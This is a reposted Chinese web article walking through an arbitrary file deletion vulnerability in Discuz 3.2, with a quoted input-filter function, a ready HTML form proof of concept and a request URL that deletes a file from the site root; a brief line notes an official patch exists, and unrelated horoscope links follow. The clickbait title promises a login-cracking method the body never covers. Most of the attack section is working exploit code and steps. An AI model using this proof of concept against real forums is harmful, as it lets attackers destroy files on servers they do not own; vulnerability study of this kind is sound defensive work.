discuz漏洞修复工具有哪些，discuz破解登录方法分享

日期：2022-05-24 文章发布：文章发布网络转载：生活号

核心提示：验证用的版本：discuz3.2 0x1首先在根目录下新建一个文件 0x2构造poc1修改出生地区注意其中的formhash需要替换掉，具体是在源码中找。为什么这里要替换掉formhash呢？一开始不太清楚，网页会报错, 如下看到了有一个xss验证蛮去找一下这个文件 privatefunction_xss_check(){static$check=array('"','>','<...

移动站源标题：http://mip.818114.com/news/item-226468.html

验证用的版本：discuz3.2

0x1首先在根目录下新建一个文件

0x2 构造poc1修改出生地区

注意其中的formhash需要替换掉，具体是在源码中找。

为什么这里要替换掉formhash呢？

一开始不太清楚，网页会报错,

如下

看到了有一个xss验证蛮去找一下这个文件

private function _xss_check() {
 static $check = array('"', '>', '<', ''', '(', ')', 'CONTENT-TRANSFER-ENCODING');
 if(isset($_GET['formhash']) && $_GET['formhash'] !== formhash())
 {
 system_error('request_tainting');
 }
 if($_SERVER['REQUEST_METHOD'] == 'GET' ) {
 $temp = $_SERVER['REQUEST_URI'];
 } elseif(empty ($_GET['formhash'])) {
 $temp = $_SERVER['REQUEST_URI'].file_get_contents('php://input');
 } else {
 $temp = '';
 }
 if(!empty($temp)) {
 $temp = strtoupper(urldecode(urldecode($temp)));
 foreach ($check as $str) {
 if(strpos($temp, $str) !== false) {
 system_error('request_tainting');
 }
 }
 }
 return true;
 }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

发现了如下代码

if(isset($_GET[‘formhash’]) && $_GET[‘formhash’] !== formhash())

{

system_error(‘request_tainting’);

}

这里就是对formhash做判断的地方了，当然判断地方不止一个。这里formhash应该是每次登陆后随机生成的，具体源码没有去找他，但尝试两次登陆后找到的formhash不一样

0x3 构造poc2删除zsdlove.txt文件

test->poc
<form 
action="http://localhost/discuz3.2/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovi
nce]=zsdlove" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" /> <br><br>
<input type="text" name="formhash" value="3e42ef6f"/><br><br>
<input type="text" name="profilesubmit" value="1"/><br><br>
<input type="submit" value="Submit" />
</from>
1
2
3
4
5
6
7
8
9

将该poc保存为html文件打开

随便上传一张图片，注意其中的formhash也要替换

在浏览器中访问

localhost/discuz3.2/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=zsdlove
1

在看看网站根目录

文件已经被删除了

0x4 修复方案:官方已经发布补丁，请尽快修复

免责声明:本网部分文章和信息来源于互联网,本网转载出于传递更多信息和学习之目的,并不意味着赞同其观点或证实其内容的真实性，如有侵权请通知我们删除！（留言删除）

留言

更多>同类行业

同类新闻

最新资讯

最新发布

最受欢迎

• 白羊男试探女生的表现（白羊男喜欢身体接触女性	• 2023年开始走十年好运的星座（2023年超好运的星
• 老黄历每曰宜忌（今日什么日子老黄历宜忌）	• 双子座幸运数字和颜色（双子座的幸运数字和颜色
• 朝鲜有多少人口?（日本有多少人口）	• eysenck倾向测试（艾森克人格测试是什么）
• 11111是什么意思（111111是什么意思）	• 六月初九是好日子吗（6月初九是黄道吉日吗）
• 蓥字女孩取名含义（取名莹字的含义莹字用于女	• 曦和熙哪个寓意好（女孩名字后用曦,熙,浠,晞哪